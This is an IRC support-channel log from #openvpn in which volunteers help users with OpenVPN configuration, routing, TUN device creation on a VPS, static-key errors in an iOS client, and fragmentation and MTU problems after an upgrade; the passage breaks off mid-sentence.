<@ecrist> datruth: try starting it outside the jail 08:52 < datruth> ecrist: openvpn on the host works fine 08:53 < vaillor> ecrist, the key is accepted 08:53 <@ecrist> vaillor: logs 08:53 < vaillor> no errors 08:53 < vaillor> i simply can't connect 08:53 <@EugeneKay> No errors does not mean nothing interesting 08:53 <@ecrist> vaillor: great, if there are no errors in the log, everything is working well 08:53 <@EugeneKay> Please produce the logs or stop expecting us to care 08:53 < vaillor> no, simply nothing happens 08:54 < vaillor> i can't enable 08:54 < vaillor> i can make a screenshot 08:54 < vaillor> is the only thing i can do 08:54 <@ecrist> datruth: it's gotta be a jail thing with restrictions on network interfaces 08:56 < datruth> hrmm 08:56 < vaillor> https://dl.dropbox.com/u/23394250/Foto%2011-03-13%2014%2055%2037.png 08:56 < vaillor> this is it 08:57 < JacquesBH> Hi guys, I've 4 clients, 1 mac, 1 win8, 2 win7, the mac and the win8 are visible with the IP of the server. But the both win7 are visible with the IP of the Internet connection... maybe there is an option somehere? 08:57 <@ecrist> do they have --no-pull in their client configs? 08:57 <@ecrist> or, are you pushing redirect gateway to them properly? 08:57 < JacquesBH> Hum I think no, I check 08:58 < JacquesBH> I'm pushing like that : push "redirect-gateway def1" 08:58 < JacquesBH> They use OpenVpn portable. 08:59 <@ecrist> are the client instances being run as root/admin? 08:59 < vaillor> ecrist, have you seen the screenshot? 08:59 <@ecrist> screen shot helps not at all 08:59 < vaillor> is what i get into openvpn CONNECT 08:59 < vaillor> logs screen is empty 08:59 < vaillor> :\ 09:00 <@ecrist> I've never used the openvpn client in iphone 09:00 <@ecrist> I can't help you 09:00 < vaillor> :\ 09:01 < JacquesBH> ecrist: maybe the admin launch 09:02 <@ecrist> without admin, the client will run, and it'll get an IP, but the routes can't be added 09:02 < vaillor> ecrist, do you know someone tho can help me in this chan? 09:02 <@ecrist> describes exactly what your problem is 09:02 <@ecrist> no 09:02 < datruth> hrmm 09:02 < datruth> not really sure what I can do to fix this 09:02 <@ecrist> run it on the host... 09:03 < datruth> that's my last resort 09:03 < datruth> ;/ 09:04 <@ecrist> datruth: I've never had a security issue with openvpn on freebsd, and we run ours publicly, and have done so since at least 2006 09:04 <@ecrist> you can drop privileges upon start 09:04 <@ecrist> also, not sure how well routing is going to work with openvpn in a jail 09:04 < JacquesBH> ecrist: thanks :) it was that. 09:04 <@ecrist> JacquesBH: no problem 09:05 < vaillor> <@ecrist> vaillor: your key needs to be inline, not a separate file. 09:05 < vaillor> why you said this? 09:05 < vaillor> if you never used that app? 09:05 < datruth> ecrist: user/group is what drops the privs? 09:06 <@ecrist> datruth: yes 09:06 < datruth> gotcha 09:06 <@ecrist> keep in mind, datruth, if you do that, you can't change the routing table aftwards 09:06 < mustu> hi all 09:07 < datruth> ecrist: in that case I should use route in the config to set all the routing tables I will need other wise make changes to the .conf and reboot? 09:07 <@ecrist> yup 09:07 < mustu> Can I connected to an OpenVPN and from there connect another VPN(Juniper) ? 09:07 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:07 <@ecrist> don't know that you need to reboot, though. 09:07 <@ecrist> mustu: no 09:07 <@ecrist> openvpn is it's own protocol 09:07 < datruth> ecrist: reboot openvpn that is 09:08 <@ecrist> then yes 09:08 < datruth> ecrist: my configuration looking good? 09:08 < datruth> from the paste.se 09:08 < mustu> ecrist: our client don't want us to connect from home. So we need to connect to our office then their office.. any clue ? 09:09 <@ecrist> datruth: nothing jumps out at me as wrong. 09:09 < datruth> thanks for the tips and your review 09:09 <@ecrist> mustu: use openvpn between home and your office, and have a juniper vpn connection between your office and your client's office 09:10 < mustu> ecrist: we don't have dedicated VMs/PC in office. Can I dial the next VPN from my PC after connecting first VPN? 09:11 <@ecrist> if you have nowhere to connect to, what's the point of the first vpn? 09:11 < mustu> client allows VPN connection from our Office IPs only. We need to work from home also. 09:12 < datruth> ecrist: I have 2 machines on 2 different networks and different internal IP subnet's what would be the best way to beable to connect to both networks? 09:14 < datruth> ecrist: would that still be using the route command in the config? 09:14 <@ecrist> and an iroute for one of the clients 09:15 <@ecrist> so, put the VPN server on one network, push route for that network and the other to all your clients 09:15 <@ecrist> setup CCD for another client, put that client on the second network, and have an iroute in the CCD file for the second network. 09:21 < datruth> ok that'll work 09:21 < datruth> so I will only need to run 1 vpn server 09:21 < datruth> ? 09:22 <@ecrist> correct 09:22 < datruth> ok great 09:24 < datruth> ecrist: even with the vpn runing on the host and dropping the root privs could I still be attacked with the buffer overflow or anything else? 09:24 <@ecrist> yes 09:29 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 09:30 -!- Netsplit *.net <-> *.split quits: Azrael_-, uberushaximus, MacGyver, nutcase, AsadH, Aprogas, TypoNe, Aketzu, pekster, JackSparrow, (+1 more, use /NETSPLIT to show all of them) 09:31 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has joined #openvpn 09:31 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has quit [Changing host] 09:31 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn 09:31 -!- Netsplit over, joins: ngharo, Aprogas, Aketzu, uberushaximus, Azrael_-, pekster 09:32 -!- Netsplit over, joins: JackSparrow 09:32 -!- Netsplit over, joins: TypoNe, nutcase 09:36 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 09:55 < vaillor> ecrist 09:55 < vaillor> http://pastebin.com/dyy4t2ai 09:55 < vaillor> this is the log 09:57 < vaillor> http://pastebin.com/QmpFWM6b 09:57 < vaillor> this is my config 09:57 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [] 09:58 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn 10:28 < syn4pse> "The certificate format is invalid" 10:28 < vaillor> i know 10:28 < vaillor> but the certificate should be a static key 10:32 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn 10:33 -!- AsadH is now known as zz_AsadH 10:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 10:48 <@ecrist> vaillor: I though there were no errors in the log... 10:50 -!- rfxn [~teck7@69.157.149.169] has joined #openvpn 10:50 < vaillor> ecrist,i'm trying to know if openvpn connect client do supports static key 10:52 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 10:54 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 10:58 -!- datruth [~datruth@unaffiliated/datruth] has quit [Ping timeout: 250 seconds] 11:05 -!- [fred] [fred@konfuzi.us] has joined #openvpn 11:06 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 11:10 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:18 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn 11:23 -!- datruth [~datruth@110.216.117.66.DED-DSL.fuse.net] has joined #openvpn 11:24 <@ecrist> vaillor: I don't know if it does or not 11:26 < pekster> vaillor: Your 2nd paste, the blob starting at line 26 is not an X509 certificate. It looks like a 2048 bit OpenVPN static key... 11:27 < pekster> You cannot feed PolarSSL/OpenSSL a static key and treat it as an X509 certificate. Hence your error on line 2 11:28 -!- datruth [~datruth@110.216.117.66.DED-DSL.fuse.net] has quit [Ping timeout: 248 seconds] 11:28 < pekster> This is completely incorrect: < vaillor> but the certificate should be a static key 11:29 < pekster> If you're using static key, you want the section 11:29 < pekster> When using the cert or key directive (or XML section) you need to be using X.509 keypairs 11:29 < vaillor> yes but i use statit key, and not ssl 11:29 < pekster> I believe I just explained what you need 11:29 < vaillor> ok, so 11:29 < vaillor> i remove all the keys 11:29 <@EugeneKay> I believe I want bacon 11:29 < vaillor> and just add 11:30 < vaillor> 11:30 < pekster> Right 11:30 < vaillor> but static key is not in x509 format 11:30 < vaillor> right? 11:31 < pekster> Static keys look like that text, although you have ASCII chars in there; AFAIK an openvpn static key is hex characters only 11:31 < pekster> Lines 12, 32, & 53 11:32 < vaillor> pekster, i modified it 11:32 < pekster> Note also that the --tls-auth option is only used in TLS (ie: X509) mode 11:32 < vaillor> to hide my key 11:32 < vaillor> :P 11:33 < pekster> That's a bad way to do that because not all the bits of the key file are used, and parts of them are used asymettrically depending on setup 11:34 < pekster> If that's a keypair you intend to use for live use, you should consider them compromised and replace them before any production use (ie: use outside of a lab for testing) 11:34 < vaillor> http://pastebin.com/sMc7t8MJ 11:34 < vaillor> now should be good? 11:35 < pekster> No, lines 6/25 need to be 11:35 < vaillor> ok, done 11:35 < pekster> Do not use unless you are actually defining an X509 certificate as explained by --cert in the manpage 11:35 < pekster> But yes 11:35 < pekster> Then it's good 11:35 < pekster> Oh, hold on 11:35 < vaillor> now, lets try 11:35 < vaillor> what? 11:35 < pekster> Probably needs to start with the armor: 11:36 < pekster> -----BEGIN OpenVPN Static key V1----- [...] -----END OpenVPN Static key V1----- 11:36 < vaillor> ok 11:36 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:36 -!- Holiday [~rjr162@magichat.dlt.psu.edu] has joined #openvpn 11:37 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 11:38 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:38 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:39 < pekster> Note also the --key-direction in the manpage, if your peer uses a 'direction' value to its secret 11:41 < vaillor> pekster 11:41 < vaillor> it wants a certificate 11:42 < vaillor> http://pastebin.com/cPxRsW8S 11:42 -!- syn4pse [~syn@p5DDC073B.dip0.t-ipconnect.de] has quit [Ping timeout: 248 seconds] 11:45 < pekster> What wants one? That config is completely valid 11:45 < vaillor> pekster are you sure that openvpn connect for ios supports static key? 11:45 < pekster> Nope, not at all 11:46 < pekster> I'm merely asserting that the config you posted is a valid OpenVPN configuration (I copied lines 2-EOF and ran it fine) 11:48 < vaillor> is there a way to know it? 11:49 -!- bjh4 [~bjh4@12.239.198.1] has quit [Quit: Leaving] 11:52 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:52 -!- mode/#openvpn [+v s7r] by ChanServ 12:00 < jzaw> lo all 12:00 < jzaw> pekster, thanks for the advice this morn 12:00 < jzaw> ive got a routed tun working now 12:00 < jzaw> but i wonder if you can help me fix one last boggle 12:00 < jzaw> ovpn server is running in a qemu-kvm VM 12:00 < jzaw> i can ping the VM ... the host and the world 12:01 < jzaw> but i cant ping the rest of the server's lan 12:01 < jzaw> however i can ping from any box on the lan to the client this end 12:01 < pekster> !serverlan 12:01 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 12:01 < jzaw> ipv4 forwarding enabled 12:01 < pekster> I'm guessing firewall or return routing are your issue 12:01 < pekster> The flowchart has a lot more than "is forwarding enabled"... 12:02 < jzaw> im no nat 12:02 < jzaw> ive set a static route in m0n0wall 12:02 < jzaw> hence im seeing the world 12:04 < jzaw> ah different diag ... thanks 12:04 < jzaw> pekster, ^^^ 12:04 < jzaw> looking 12:05 < jzaw> pekster, that flow chart doesnt seem to cover my case 12:05 < jzaw> i can ping world 12:05 < jzaw> i can ping server VM and the host 12:05 < jzaw> i can ping router 12:05 < jzaw> but cant ping other hosts on the lan 12:06 < jzaw> all hosts on the lan can ping the tunnel endpoints ... and client 12:06 < pekster> server-side LAN clients can ping the client? 12:06 < jzaw> yes 12:06 < pekster> Then you have a firewall issue 12:07 < jzaw> iptables is empty on all machines between lan client host, VM and client 12:07 < jzaw> and ip route seems to show routes down via correct ips on correct interfaces 12:08 < jzaw> else how could a lan host ping the distant vpn client? am i right in thinking? 12:10 < jzaw> pekster ... whats the convention about using this ! info ? 12:10 < jzaw> is one allowed in channel 12:10 < jzaw> !route_outside_openvpn 12:10 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 12:12 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 12:32 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 12:47 -!- brute11k [~brute@89.249.235.169] has quit [Quit: Leaving.] 12:48 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 13:08 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 13:17 -!- master_o1_master [~master_of@p4FF24E96.dip.t-dialin.net] has joined #openvpn 13:20 -!- master_of_master [~master_of@p4FF24F4B.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 13:23 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has joined #openvpn 13:24 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has quit [Client Quit] 13:26 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has joined #openvpn 13:26 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 13:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 13:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:33 < gan_> !welcome 13:33 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 13:33 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 13:34 < gan_> !howto 13:34 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 13:42 -!- raidz is now known as raidz_away 13:43 -!- raidz_away is now known as raidz 13:48 < gan_> Trying to set up openvpn server on a VPS node (KVM) running Ubuntu. I have no TUN interface apparently. Didn't really find any info, it's supposed to be created when openvpn starts is that correct? 13:49 < gan_> Have been trying to create it in various ways. Hope someone can set me in the right direction to debug. http://pastebin.com/RkjMC69J 13:49 < Dennis84> Wulf: did you have time on the weekend to get further information? 13:51 < pekster> gan_: Are you missing tun support in the kernel? There should be an explicit error about that in your openvpn logs if that's the case 13:53 < gan_> I see a few OpenVPN messages in syslog. Is there another log and if so where? 13:53 < pekster> !log 13:53 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 13:53 < pekster> !factoids whatis log 13:53 <@vpnHelper> "log" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging 13:54 < gan_> By the way I have previously looked in what I think is the kernel config. But let me look at the log 13:57 -!- wachpwnski [~wachpwnsk@67.176.229.52] has joined #openvpn 13:57 < wachpwnski> when you use openvpn --config foo.ovpn is there any way to also state a username and password? 13:58 < pekster> wachpwnski: See --auth-user-pass in thte manpage for how you can pass a file with the credentials. It's a potential security risk to do so, since your credentials must be in plaintext in this file 13:59 < wachpwnski> pekster better than copy pasting now. haha 14:00 < vaillor> pekster, is easy to set a configuration with ssl certificates? 14:00 < pekster> Yup. See the howto that guides you through the process 14:00 < pekster> !howto 14:00 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 14:03 < vaillor> ok thanks 14:03 < gan_> pekster: No, no errors claiming there is no TUN support. I have not built the kernel but looked in the config Ubuntu stores under /boot. It says CONFIG_TUN=y. Is there any other needed? 14:04 < gan_> It looks like I have no device under /dev/net/tun . I was wondering if it is normal to have to create it manually. I will follow an instruction I found to mknod this. 14:04 < pekster> That should be it; you should have a /dev/net/tun character device (that's not the tun interface that openvpn creates dynamically, but it will be present with tun support loaded) 14:04 < pekster> Probably some weirdness with your virt setup then 14:05 < pekster> If you can create the device outside openvpn, you can also pass the explicit device to use. It's usually more convienent to let openpvn dynamically create the device, though 14:08 < gan_> I think I succeeded once(!) before in creating a device using "ifconfig up tun0", but never again. Or what other command would be used to create it? 14:09 < pekster> Don't use ifconfig on modern Linux distros as it's an ill-maintined pile of crap. 'ip' is the new tool you should be using 14:09 < gan_> or maybe creating is not the right word. But it appeared in ifconfig after. I think I'm missing some knowledge and testing blindly. Help appreciated on how these devices are really handled. 14:09 < gan_> Ah yes, maybe I did use ip actually. Anyway, will try. 14:09 < pekster> eg: ip tuntap add dev tun3 mode tun 14:10 < pekster> openvpn also has options to create the tun device, if you'd prefer. 'ip' is the "properr" way to do it on Linux if you're trying to do it completely outside openvpn 14:10 < pekster> Just don't use ifconfig to do it ;) (no, really. http://inai.de/2008/0219-ifconfig-sucks.php ) 14:10 <@vpnHelper> Title: j.eng's site: News, Notes, Quips, Tweets, Things to share. (at inai.de) 14:11 < gan_> Ah, missed the mode. :) Thanks I vow to alias ifconfig="do not use you stupid 14:11 < pekster> Well, sadly stuff tends to break if you do that. Debian/Ubuntu in particular cling to it like it's the early 90's 14:11 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:11 < gan_> The plot thickens: ip returns: ioctl(TUNSETIFF): Device or resource busy 14:12 < gan_> How do I list devices that "exist"? (used to do ifconfig without any args...) 14:12 < pekster> 'ip a' 14:13 < pekster> That URL I linked shows you the correct modern replacements for ifconfig, route, and similar deprecated tools 14:13 < gan_> Guess what, it reports tun0 :) 14:13 < gan_> and ifconfig doesn't 14:14 < pekster> !learn ifconfig-linux Avoid use of 'ifconfig' and 'route' commands on modern Linux distros. It's old, deprecated, and often misleading/wrong. More info: http://inai.de/2008/0219-ifconfig-sucks.php 14:14 <@vpnHelper> (learn [] as ) -- Associates with . is only necessary if the message isn't sent on the channel itself. The word 'as' is necessary to separate the key from the value. It can be changed to another word via the learnSeparator registry value. 14:14 < pekster> !learn ifconfig-linux as Avoid use of 'ifconfig' and 'route' commands on modern Linux distros. It's old, deprecated, and often misleading/wrong. More info: http://inai.de/2008/0219-ifconfig-sucks.php 14:14 <@vpnHelper> Joo got it. 14:18 < gan_> If I'm not misreading the logs openvpn runs now without error (used --dev tun0). Yay! Next step iptables to open port and then test the client side. 14:18 < gan_> or could any further test be done locally? 14:18 < vaillor> pekster, http://openvpn.net/index.php/open-source/documentation/howto.html#policy 14:18 <@vpnHelper> Title: HOWTO (at openvpn.net) 14:18 < vaillor> seems too much long 14:19 < vaillor> is there not a shorter guide? 14:19 < pekster> You're in a specific section dedicated to per-client policies 14:19 < pekster> If you do not require per-client policies, why are you concerned with it? 14:20 < pekster> Your can get a "working" VPN much earlier in the guide. By the end of the "Starting up the VPN and testing for initial connectivity" section your VPN will work 14:22 < vaillor> ok 14:22 < pekster> vaillor: What does 'openvpn --mktun --dev tun1' do? 14:22 < pekster> Erm, gan_ ^^ 14:22 < vaillor> root@debian-VM:/etc/openvpn# openvpn --mktun --dev tun1 14:22 < vaillor> Sat Mar 9 18:42:30 2013 TUN/TAP device tun1 opened 14:22 < vaillor> Sat Mar 9 18:42:30 2013 Persist state set to: ON 14:22 < pekster> Sorry, that was for gan_ 14:22 < pekster> You can --rmtun that if you want 14:22 < gan_> Mon Mar 11 20:22:38 2013 TUN/TAP device tun1 opened 14:22 < gan_> Mon Mar 11 20:22:38 2013 Persist state set to: ON 14:23 < pekster> So, openpvn should have no problem creating your tun device 14:23 < pekster> In fact, if you didn't actually create tun0 with ip (you said it failed) openvpn probably already did do it for you 14:23 < pekster> So, I'm not sure anything is broken at all... 14:23 < gan_> Yes. 14:24 < gan_> No it's no longer broken as I said further up. It WAS broken, but now the logs look ok. 14:24 < gan_> Just one question, with openvpn running I should not expect the tun interface to have an IP adress? E.g. 10.8.something in the default config? ip now reports the interface but no bound adress 14:25 < gan_> So ip a reports: 3: tun0: mtu 1500 qdisc noop state DOWN qlen 100 link/none 14:25 < pekster> It needs to be assigned an IP through your config, either via 'ifconfig' or via a pushed option on the server-side with use of --client or --pull by the client 14:25 < pekster> THat shows it's also down 14:26 < pekster> openvpn should be setting it as "up" when it uses it. Can you try stopping openvpn, remove any extra tun interfaces you've created, and start it again without an explicit device? 14:26 < gan_> Yes will do 14:26 < pekster> It should dynamically create the device itself, minus any problems your virt solution is giving you 14:26 < gan_> got it 14:28 < pekster> With CONFIG_TUN=y in the kernel, you shouldn't even need to load the module first. You "should" have /dev/net/tun as described in the kernl docs under Documentation/networking/tuntap.txt 14:31 < gan_> Something is strange because I have "dev tun" in server.config, but just running with no args (except an explicit --log myfile.txt) yields "Options error: You must define TUN/TAP device (--dev)" and then it exits 14:32 < gan_> I would have guessed the server.config does the same thing? 14:32 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:34 < pekster> If you run with no args at all except a log, yes, it is expected it will complain that it doesn't know what device type you want 14:35 < pekster> The "most minimal" command you could feasibly use from the command-line would be: openvpn --dev tun --secret k.key 14:35 < pekster> That will use a static key you provide in tun mode and open for listening connections. No address configuration, etc 14:41 < gan_> OK, must have misunderstood you. Anyhow, I think I'll push forward trying to get the interfaces up and see what happens 14:42 < gan_> I assigned an address to tun0. It now seems active and quite OK because OpenVPN brings it up and down as it is started and shut down (but not sure if the address I forced is correct?) 14:42 < pekster> Oh, yea, by start without explicit device, I mean don't pre-created it :) 14:42 < pekster> create* 14:43 < pekster> See --ifconfig and --ifconfig-push in the manpage. Also relevant: --server and --ifconfig-pool 14:43 < gan_> OK :) But I think we moved forward only when I explicitly did a mknod /dev/net/tun 14:43 < pekster> It's another convenience/abstraction openvpn provides so you don't need per-OS ways to handle addressing 14:43 < pekster> Yea, seems your virt solution has tun support in the kernel but does not provide the /dev/net/tun character device node for you on boot 14:44 < pekster> I'd add that to your openvpn initscript or at a place logical for your distro 14:44 < gan_> got it. 14:44 < gan_> tun1 is another if I created with ip. It does not have an ip assigned. OpenVPN does NOT succeed in bringing it UP when starting --dev tun1 14:45 < gan_> Strange details. Anyhow, assuming tun0 now seems relatively sane, is there a risk I have assigned a static adress to it? 14:45 < pekster> [ ! -f /dev/net/tun ] && mknod /dev/net/tun c 10 200 || some_error_func "mknod failed" 14:45 < gan_> Or should it have a static adress/ 14:45 < gan_> thanks, copied for inclusion in bootup 14:46 < pekster> You don't want static addresses to collide with a pool handed to other clients, otherwise no 14:47 < gan_> OK, so I was about to go test the client side. Only question, can I test any connection locally first? 14:56 < pekster> You mean run the client & server on the same host? I'll do that when I'm testing configs sometimes, but it's not a great way to test if things work between different hosts 14:57 < gan_> No sure, just taking step by step here considering the trouble so far, and the fact that I might not know what I'm doing yet :) 14:58 < gan_> Come to think of it I think I followed the advice to remove the client keys from the server... :P I'm going for network test now instead.. 14:59 < pekster> For a secure environment, your PKI should be separate from your server. It's a security risk to keep your CA key on the server, although many people do it anyway accepting that risk 14:59 < pekster> Easy-RSA can be run from any system you'd like 15:00 < gan_> Yeah, I've done all the cert and key generation with easy-rsa 15:01 < pekster> The way the howto shows is the "abridged intro" to Easy-RSA. It's possible to use it to split the keypair generation and signing into separate steps, so your private keys never leave the system you use them on 15:05 < gan_> Yup. I get it. Still, need more hands on experience to do something like that. I forgot to state the ultimate goal. Security isn't super critical because there won't be a LAN this time around (although I intend to do this for home network later) This setup is nothing but a single forwarding proxy 15:06 < gan_> Or it's intended to be, if I succeed that is :P 15:06 -!- hatschi [~marvin@dslb-092-074-209-205.pools.arcor-ip.net] has joined #openvpn 15:06 < pekster> Sure, and it's all relative. Many people use Easy-RSA on the server and like it due to ease of use. Other people have a secure room with encrypted offline PKI storage that requires 2 authorized officers to approve access to the CA. All depends on your needs really 15:07 < hatschi> hi there 15:08 < pekster> fwiw, the next-gen version of Easy-RSA (I'm actually authoring some prototype code for it as we speak) will make it much easier to generate/sign on different boxes 15:08 < pekster> No silly "org/city/state" stuff, unless you want to enable it 15:08 * gan_ is planning to build a secure room and hire 2 officers 15:08 < hatschi> somebody here having a minute or two having an eye on my openvpn 2.2 to openvpn 2.3 update test issues? 15:08 < pekster> !ask 15:08 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 15:10 < pekster> ~/src/ersa-3.x $ grep FIXME * 2>/dev/null | wc -l 15:10 < pekster> 13 15:10 < pekster> Just a few things to fix first ;) 15:11 < hatschi> okay. i have several tunnels alive. all tunnels based on TCP work, but i have issues with tunnels over UDP. I have some sites with buggy routes that have troubles with UDP fragmentation, so i'm using fragment 1400 / mss fix in my config. 15:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:12 < hatschi> the config works fine with 2.2, but when using 2.3 both ends log WARNING: 'link-mtu' is used inconsistently, local='link-mtu 1546', remote='link-mtu 1542' and WARNING: 'mtu-dynamic' is present in local config but missing in remote config, local='mtu-dynamic'. Also the server complains with 'Bad LZO decompression header byte:' many times... 15:13 < hatschi> as far as a know fragmentation adds 1 or 2 bytes overhead to the packet. for me it seems that 2.3 client has trouble to understand the fragment command. is there something new in fragmentation with 2.3 i missed? 15:15 < pekster> --fragment prevents UDP packets from being sent that are larger than the specified size. For it to work if you have a network connection with broken PMTU between the peers, both sides will need to match the value. Are you also tweaking any of the --link-mtu or --tun-mtu options? Those need to match too, and are generally best left alone 15:17 < pekster> You might try disabling lzo on both clients and see what the MTU is between your links using the --mtu-test option added to a working config on the client. It'll take a few minutes to complete, but it'll test and report the MTU that you can use to tune --fragment and --mss-fix 15:17 < hatschi> fragment is the same on both end's. the original config also sets tun-mtu 1500 (i read somewhere that's the right choice) and it worked for me in this setup. i had no mtu issues from broken DSL-routers with this issue. 15:18 < gan_> I'm clearly way out of my league here... but learned once that ICMP is used to report fragmentation stuff. So if any of your intermediate routers/firewalls are blocking all ICMP (because you think it's a good idea to drop pings) you might want to check it. 15:18 < hatschi> i have none of these routers accessible at the moment, but i tester it with 2.2 and it was somewhere around 1400. as already mention, the config works with 2.2 but fails with 2.3... 15:20 < pekster> Right, that's a little odd. I'm not aware of an intentional change that would break that. The mismatch on link-mtu and mtu-dynamic warnings would appear to be a mis-match between the 2 peers' settings 15:20 -!- Orbi [~opera@93.182.148.191] has joined #openvpn 15:21 < hatschi> gan_: i know quite well which devices are causing the trouble - but i have to life with them. and yes, sending ICMP would be the right way… but these things just drop packets exceeding 146? bytes initially and after some time it seems that the device even stops forwarding packets for this port... 15:21 < pekster> The good news is that IPv6 mandates PMTU handling as part of its protocol. The bad news is that you're not using it 15:22 < hatschi> pekster: i already had this idea too. and the missing 2 bytes in the link mtu could fit to the bytes added by fragmentation. also the 2nd message about 'mtu-dynamic' - it's the old config keyword for fragmentation. 15:22 < pekster> Yea, I mean you can try an even smaller fragment size and see if it goes away, or try disabling comp-lzo completely to see if at least you can reduce those errors to eleminate the possibility some comp-lzo mismatch is messing with packet sizes 15:22 < pekster> Right 15:23 < hatschi> any idea or pointer where i can see if the client has enabled fragmentation? is there anything i can see from the logs? 15:23 < pekster> It sounds like one end is deciding that PMTU decation allows for a size of X, but the other peer ends up using Y, and thus comp-lzo freaks out when it can't decompress the packet 15:23 < gan_> hatschi: ok, I can only wish you good luck then :) 15:23 < pekster> --verb 4 should show you full config on startup, unless you're using an "official" build of 2.3.0 since bug #260 makes verb 4 worthless :\ 15:24 < hatschi> just give me a sec, i disable lzo and see what happens. 15:24 < pekster> (if you can build from source, set enable_debug=yes when you build and --verb 4 works normally) 15:25 < pekster> I don't really think lzo is your issue (that is, if you already checked it matches on both peers) but it might be masking the real issue 15:26 < hatschi> i also think that lzo is using the wrong entry because of the 2 byte link-mtu entrance - i assume the server cut of 2 bytes because it thinks they are for fragmentation. 15:26 < hatschi> wait a moment i think i've also seen some other logs.... 15:27 < pekster> Remember that comp-lzo has multiple modes, including on/off/adaptive 15:27 < hatschi> yep: FRAG_IN error flags=0xfa450005: bad fragment size 15:27 < hatschi> FRAG_IN error flags=0xfa2a187b: FRAG_TEST not implemented 15:27 < pekster> Oh, this rings some vauge bell. I remember hunting in the code for that FRAG_TEST recently 15:30 < hatschi> okay, i've disabled LZO and have a bunch of new messages: 15:30 < hatschi> FRAG_IN error flags=0x45000040: spurrious FRAG_WHOLE flags 15:30 < hatschi> IP packet with unknown IP version=0 seen 15:30 < hatschi> IP packet with unknown IP version=3 seen 15:31 < pekster> comp_lzo is disabled on *both* ends? 15:31 < hatschi> FRAG_IN error flags=0x45000045: bad fragment size 15:31 < hatschi> yes, on both ends ;) 15:31 < hatschi> FRAG_IN error flags=0x45000030: spurrious FRAG_WHOLE flags 15:31 < pekster> That error about IP version should only pop up when a corrupt (ill-formatted) packet comes through 15:31 < hatschi> or if the server expects fragmented backers but the client doesn't fragment... 15:32 < hatschi> btw: the server is a multiserver.... 15:33 < pekster> The FRAG_TEST is define to 3, so that is possibly where the IP version thing comes from (only values 4 & 6 are valid IP versions, for IPv4 and IPv6 traffic.) 15:33 < pekster> Any other value there is assumed to be a malformed packet, thus 